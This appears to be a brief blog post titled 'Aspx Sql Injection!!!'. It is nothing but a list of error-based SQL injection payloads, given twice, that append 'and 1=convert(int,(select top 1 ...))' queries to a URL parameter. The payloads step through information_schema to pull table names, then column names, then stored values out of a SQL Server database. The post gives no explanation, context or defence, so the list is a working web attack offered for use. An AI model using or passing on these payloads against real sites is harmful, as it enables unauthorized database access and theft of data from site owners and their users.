Aspx Sql Injection!!!
url.asp?m=1025 and 1=convert(int,(select top 1 table_name from information_schema.tables))
url.asp?m=1025 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('------')
url.asp?m=1025 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('------','----')
url.asp?m=1025 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='------'))
url.asp?m=1025 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='-----' and column_name not in('------')))
url.asp?m=1025 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='----' and column_name not in('-----','-----')))
url.asp?m=1025 and 1=convert(int,(select top 1 ------ from [*table name]))url.asp?m=1025 and 1=convert(int,(select top 1 --- from [*table name]))
------------------------------------------------------------
-----------------------------------------------------------
url.asp?m=1025 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('------')
url.asp?m=1025 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('------','----')
url.asp?m=1025 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='------'))
url.asp?m=1025 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='-----' and column_name not in('------')))
url.asp?m=1025 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='----' and column_name not in('-----','-----')))
url.asp?m=1025 and 1=convert(int,(select top 1 ------ from [*table name]))url.asp?m=1025 and 1=convert(int,(select top 1 --- from [*table name]))
------------------------------------------------------------
-----------------------------------------------------------
Comments
Post a Comment